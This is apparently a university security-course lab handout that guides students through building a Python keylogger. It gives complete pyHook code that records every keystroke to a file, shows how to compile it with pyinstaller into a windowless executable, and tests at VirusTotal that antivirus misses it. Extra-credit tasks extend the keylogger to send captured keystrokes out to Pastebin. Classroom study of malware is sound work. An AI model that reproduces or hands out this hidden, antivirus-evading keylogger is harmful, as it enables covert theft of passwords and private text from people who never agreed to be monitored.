Proj 9: Keylogger with Python (15 pts. + 25 pts. extra credit)

WARNING

This is really dangerous stuff--you will make real keyloggers that cannot be stopped by antivirus. Don't send this to anyone else--you could commit real crimes with this stuff. So, as always,

ONLY RUN THIS ON YOUR OWN TEST SYSTEMS

It's OK to run it in SCIE 214, of course, but NOT on other machines on campus.

I don't know what's wrong with the antivirus companies. It should NOT be this easy to defeat them.

What You Need

Purpose

Make a keylogger in Python. This is a very common and dangerous form of malware.

Installing Python, PyWin32, and pip

If you are using the same machine you used for the previous project, you have already done this.

If not, install Python, PyWin32, and pip as explained in Project 8.

Installing a C Compiler

Go to

http://go.microsoft.com/?linkid=7729279

Download and run the vcsetup.exe file.

Click Next.

Accept the license terms and click Next.

Uncheck "Silverlight" and "Microsoft SQL Server".

Click Next, Install.

Wait while software downloads and installs, as shown below:

Troubleshooting

If you see a message saying 'You must use "Turn Windows features on or off" in the Control Panel to install or configure Microsoft .NET Framework 3.5 SP1.", click OK. Continue and exit the Visual Studio C++ Express installer. It will say it failed.

Click Start, "Control Panel".

Click Programs.

Click "Turn Windows features on or off".

Click the check box next to "Microsoft .NET Framework 3.5.1". Click OK.

Double-click the vcsetup.exe file and run the installation again.

Restart your computer if you are prompted to.

Installing swig

Go to

http://www.swig.org/download.html

In the sentence starting with "Windows users should download...", click the swigwin-3.0.0 link.

Save the swigwin-3.0.0.zip file on your desktop.

Right-click it, and click "Extract All...", Extract.

On your desktop, double-click the swigwin-3.0.0 folder.

Double-click the swigwin-3.0.0 subfolder.

Right-click the swig.exe file and click Copy.

Navigate to the C:\Windows\System32 folder, right-click an empty portion of the window, and click Paste.

If a box pops up saying "You'll need to provide Administrator permission...", click Continue.

Open pip-Win

Click Start.

In the Search box, type pip-win.

It may take several seconds to find it, but when it does, pip-Win_1.6.exe should appear. Click it.

In the Command field enter

venv pyi-env-name
Click Run

A Command Prompt opens with a prompt beginning with

<pyi-env-name>

Getting PyHook

Go to

http://sourceforge.net/projects/pyhook/files/

Click the "Download pyHook-1.5.1.zip (13.9 kB)" link.

Save the file on your desktop.

Right-click it, and click "Extract All...", Extract.

In the Command Prompt, at the "<pyi-env-name> C:\Users\Administrator" prompt, execute these commands (you may need to change the path to get to the desktop on your system):

set SWIG_LIB=C:\Users\Administrator\Desktop\swigwin-3.0.0\swigwin-3.0.0\Lib

cd C:\Users\Administrator\Desktop

cd pyHook-1.5.1\pyHook-1.5.1

setup.py install

A successful install looks like this:

Writing your Keylogger

Open Notepad and enter this code:
import pythoncom, pyHook, sys, logging
LOG_FILENAME = 'YOURNAME-keylog.txt'
def OnKeyboardEvent(event):
    logging.basicConfig(filename=LOG_FILENAME,
                        level=logging.DEBUG,
                        format='%(message)s')
    print "Key: ", chr(event.Ascii)
    logging.log(10,chr(event.Ascii))
    return True
hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()
Replace "YOURNAME" with your own name.

Save it as YOURNAME-keylog.py on your Desktop. When saving, use "Save as type" of "All Files" to prevent Notepad from adding a ".txt" file extension.

Running your Keylogger in Python

In the Command Prompt, at the "<pyi-env-name> C:\Users\Administrator" prompt, execute these commands:

cd C:\Users\Administrator\Desktop

YOURNAME-keylog.py

Open Notepad and type in your name.

You should see the keypresses being captured, as shown below:

Capturing a Screen Image

Make sure the Command Prompt window showing the "Key: " lines are visible, spelling out your name, as shown above.

Click on the host system's taskbar, at the bottom of the screen.

Press the PrntScrn key to capture the whole desktop. Open Paint and paste in the image.

Save the image as "Proj 9a from YOUR NAME".

YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT

Stopping the Keylogger

Close Notepad.

Close the Command Prompt.

In the "Pip-Win_1.6" box, click Run.

Compiling your Keylogger

In the Command Prompt, at the "<pyi-env-name> C:\Users\Administrator" prompt, execute these commands:
cd C:\Users\Administrator\Desktop

pyinstaller --onefile --noconsole YOURNAME-keylog.py

A folder named "Dist" should now be present on your desktop. Double-click the Dist folder.

You should see your executable keylogger, named "YOURNAME-keylog.exe".

Running your Keylogger

Double-click the YOURNAME-keylog.exe file to run it.

No window opens.

Right-click the taskbar and click "Task Manager. On the Processes tab, you can see the keylogger running, as shown below.

Open Notepad and type in your name again.

A file named "YOURNAME-keylog.txt" appears in the Dist folder, as shown below.

Double-click the YOURNAME-keylog.txt file. Your name should be visible, as shown below.

Capturing a Screen Image

Make sure your name is visible in the "YOURNAME-keylog.txt" file, as shown above.

Click on the host system's taskbar, at the bottom of the screen.

Press the PrntScrn key to capture the whole desktop. Open Paint and paste in the image.

Save the image as "Proj 9b from YOUR NAME".

YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT

Testing the Malware at VirusTotal

In Windows, in a Web browser, go to

http://virustotal.com

Click the "Choose File" button.

Browse to your "YOURNAME-keylog.exe" file and double-click it.

Click the "Scan It!" button.

Your file should be essentially undetectable now, as shown below.

Capturing a Screen Image

Make sure the VirusTotal results are visible, showing how often the YOURNAME-keylog.exe file is detected, as shown above.

Click on the host system's taskbar, at the bottom of the screen.

Press the PrntScrn key to capture the whole desktop. Open Paint and paste in the image.

Save the image as "Proj 9c from YOUR NAME".

YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT

Turning in Your Project

Send the images to cnit.124@gmail.com with a subject of "Proj 9 from YOUR NAME".

Challenge 1: Pastebin API (10 pts.)

In a Web browser, go to

http://pastebin.com/

At the upper right, click the "sign up" link. Create an account. For an email account, I recommend using this service:

http://mailinator.com/

Open the email from pastebin and click the link in it to activate your account.

In the Pastebin window, logged in to your account, at the top right, click the api link. Read the "Your Unique Developer API Key" and "Creating a New Paste" sections.

Write a Python script that will post your initials on Pastebin. I recommend using your initials rather than your whole name because I don't know any way to delete the text once it gets posted this way.

I recommend reviewing "Proj 5: HTTP Scanning with Python".

When you get it working, capture these two images:

A Wireshark capture of the TCP stream showing that it worked, and returned a URL to the pastebin post:

An image of the Web page showing your initials pasted to Pastebin:

Challenge 2: Pastebin Keylogger (15 pts.)

Make a keylogger that capture some keystrokes and send them to Pastebin. I set it to wait until it saw a RETURN key, and then upload to pastebin, but you can do it any way you like.

When you get it working, capture these two images:

A Wireshark capture of the TCP stream showing that it worked, and returned a URL to the pastebin post:

An image of the Web page showing your initials pasted to Pastebin:

You don't need to compile this into an EXE or test it at VirusTotal, but I did, and it is completely undetectable:

Sources

http://stackoverflow.com/questions/2817869/error-unable-to-find-vcvarsall-bat

http://www.daniweb.com/software-development/python/threads/229564/python-keylogger


Last revised: 3-18-14 10:03 am
Test of Pastebin Keylogger at VirusTotal added 3-25-14 10:32 am
Minor corrections 6-22-14 8:15 am